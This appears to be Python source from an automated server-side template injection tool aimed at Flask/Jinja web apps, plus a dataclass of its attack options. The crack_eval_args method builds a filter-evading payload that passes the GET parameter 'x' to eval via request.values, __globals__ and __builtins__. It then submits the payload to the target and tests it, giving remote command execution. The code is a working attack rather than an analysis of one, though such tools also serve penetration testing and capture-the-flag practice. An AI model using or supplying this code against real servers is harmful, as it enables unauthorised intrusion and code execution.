                "[yellow bold]IT MIGHT MAKE YOUR COMMAND EXECUTE TWICE![/]",
                extra={"markup": True, "highlighter": None},
            )
            logger.warning(
                "[yellow bold]Use Ctrl+C to exit if you don't want it![/]",
                extra={"markup": True, "highlighter": None},
            )
            time.sleep(6)
            waf_expr_func = self.expr_waf_not500(
                tree, full_payload_gen.outer_pattern, full_payload_gen.context_vars
            )
            result = self.crack_with_waf(waf_func, waf_expr_func=waf_expr_func)
            if result:
                full_payload_gen, will_print, test_result, tree = result
            if test_result == "FAIL_500":
                logger.info(
                    "[yellow bold]It's still 500, sorry...[/]",
                    extra={"markup": True, "highlighter": None},
                )
            self.log_with_result(will_print, test_result)
        return full_payload_gen

    def crack_eval_args(self) -> Union[Tuple[Submitter, EvalArgsModePayloadGen], None]:
        """开始进行攻击，生成一个会eval GET参数x中命令的payload, 将其放进一个新的submitter中并返回。
        新的submitter会填充GET参数x、提交并返回结果。

        Returns:
            Union[Tuple[FullPayloadGen, Submitter, bool], None]:
                产生的payload生成器，提交器，以及是否会产生回显
        """
        args_target_field = "x"
        logger.info(
            "Cracking with request GET args...",
            extra={"markup": True, "highlighter": None},
        )
        assert isinstance(
            self.subm, FormSubmitter
        ), "Currently onlu FormSubmitter is supported"
        waf_func = self.waf_func_gen.generate()
        full_payload_gen = FullPayloadGen(waf_func, callback=None, options=self.options)
        full_payload_gen.do_prepare()
        assert full_payload_gen.payload_gen is not None
        self.add_request_args(
            full_payload_gen,
            waf_func,
            extra_values=[
                "__globals__",
                "__builtins__",
                "values",
                "eval",
            ],
        )
        full_payload_gen.payload_gen.cache_by_repr.clear()
        payload, will_print = full_payload_gen.generate(
            EVAL,
            (
                CHAINED_ATTRIBUTE_ITEM,
                (FLASK_CONTEXT_VAR, "request"),
                (ATTRIBUTE, "values"),
                (ATTRIBUTE, args_target_field),
            ),
        )
        if payload is None:
            return None
        assert will_print is not None, "It just shouldn't! when payload is not None!"
        payload_dict = {self.subm.target_field: payload}
        method = self.subm.form["method"]
        assert isinstance(method, str)
        payload_param = random_fill(self.subm.form)
        payload_param.update(payload_dict)
        params = self.subm.extra_params.copy()
        data = {}
        if method in ["GET", "HEAD"]:
            params.update(payload_param)
        else:
            data.update(payload_param)

        new_subm = RequestSubmitter(
            url=self.subm.url,
            method=method,
            target_field=args_target_field,
            params=params,
            data=data,
            requester=self.subm.req,
        )
        if self.subm.tamperers:
            for tamperer in self.subm.tamperers:
                new_subm.add_tamperer(tamperer)
        if will_print:
            if self.test_payload_eval_args(self.test_eval, new_subm):
                logger.info(
                    "[cran bold]Success[/] Now we can generate payloads.",
                    extra={"markup": True, "highlighter": None},
                )
            else:
                logger.info(
                    "[yellow bold]Test Payload Failed[/] Generated payloads might be useless.",
                    extra={"markup": True, "highlighter": None},
                )
        else:
            logger.info(
                "We WON'T SEE the execution result! You can try generating payloads anyway.",
                extra={"markup": True, "highlighter": None},
            )

        return new_subm, EvalArgsModePayloadGen(will_print)



from typing import Sequence, Union
from dataclasses import dataclass
from .const import (
    DetectMode,
    TemplateEnvironment,
    PythonVersion,
    ReplacedKeywordStrategy,
    AutoFix500Code,
    DetectWafKeywords,
)


@dataclass
class Options:
    """影响到攻击逻辑的选项"""

    detect_mode: DetectMode = DetectMode.ACCURATE
    environment: TemplateEnvironment = TemplateEnvironment.FLASK
    replaced_keyword_strategy: ReplacedKeywordStrategy = ReplacedKeywordStrategy.AVOID
    python_version: PythonVersion = PythonVersion.UNKNOWN
    python_subversion: Union[int, None] = None
    autofix_500: AutoFix500Code = AutoFix500Code.ENABLED
    detect_waf_keywords: DetectWafKeywords = DetectWafKeywords.NONE
    waf_keywords: Sequence[str] = tuple()
